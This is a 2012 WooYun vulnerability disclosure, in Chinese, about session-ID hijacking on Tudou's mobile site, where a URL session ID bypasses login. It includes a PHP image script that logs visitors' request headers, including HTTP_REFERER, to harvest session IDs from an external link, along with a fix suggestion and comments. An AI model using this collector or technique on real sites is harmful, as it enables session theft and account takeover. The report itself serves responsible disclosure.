当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-09268

漏洞标题:手机土豆网SID劫持

相关厂商:土豆网

漏洞作者: zhk

提交时间:2012-07-06 10:07

修复时间:2012-07-11 10:07

公开时间:2012-07-11 10:07

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-07-06: 细节已通知厂商并且等待厂商处理中
2012-07-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

手机土豆网SID劫持,结合xss

详细说明:

http://m.tudou.com/view.do?v=2&sid=431b965d858e452c8f4453***(就是此处的SID)&code=146240234
直接用SID可以绕过验证
结合刚刚发的XSS可以获取SID,也可以通过外部的PHP链接获取SID(只需要一处能够加外链的地方,比如发表日志的地方)
可用HTTP_REFERER获取

<?php
/*filename:img.php*/
$code = $_SERVER['SERVER_ADDR'];//strtoupper(substr(md5(rand()),0,5));
$img=imagecreate(1000,500);
imagecolorallocate($img,233,233,233);
$color=imagecolorallocate($img,0,0,0);
imagestring($img,4,5,5,"IP:".$_SERVER['REMOTE_ADDR'],$color);
imagestring($img,4,5,20,"HTTP_ACCEPT:".$_SERVER['HTTP_ACCEPT'],$color);
imagestring($img,4,5,35,"REMOTE_HOST:".$_SERVER['REMOTE_HOST'],$color);
imagestring($img,4,5,50,"REMOTE_PORT:".$_SERVER['REMOTE_PORT'],$color);
imagestring($img,4,5,65,"REMOTE_USER:".$_SERVER['REMOTE_USER'],$color);
imagestring($img,4,5,80,"REQUEST_URI:".$_SERVER['REQUEST_URI'],$color);
imagestring($img,4,5,95,"HTTP_REFERER:".$_SERVER['HTTP_REFERER'],$color);
imagestring($img,4,5,110,"TIME:".date('Y-m-d H:i:s'),$color);
header("content-type:image/png");
imagepng($img);
imagedestroy($img);
?>

漏洞证明:


修复方案:

sid加入其它验证,如果只补XSS,还是有可能用其它方法利用的,比如诱导用户点击连接到外面或者加入外链用HTTP_REFERER获取

版权声明:转载请注明来源 zhk@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-07-11 10:07

厂商回复:

漏洞Rank:7 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2012-07-06 15:02 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    手机上的xss,csrf在04年、05年那会儿就见过好多~不过当时不太懂,发个贴,加删除帖子的链接,诱使管理员点击。还有好多盗号案例。因为当时的手机很多很多不支持cookie,只能把相关参数加密写入URL

  2. 2012-07-10 15:33 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @土豆网 突然发现4月以来,大多数报告都被忽略

  3. 2012-07-11 11:05 | zhk ( 普通白帽子 | Rank:436 漏洞数:70 | 先看公告~)

    @土豆网 算你狠

  4. 2012-07-12 12:00 | 土豆网(乌云厂商)

    sorry,没有忽略。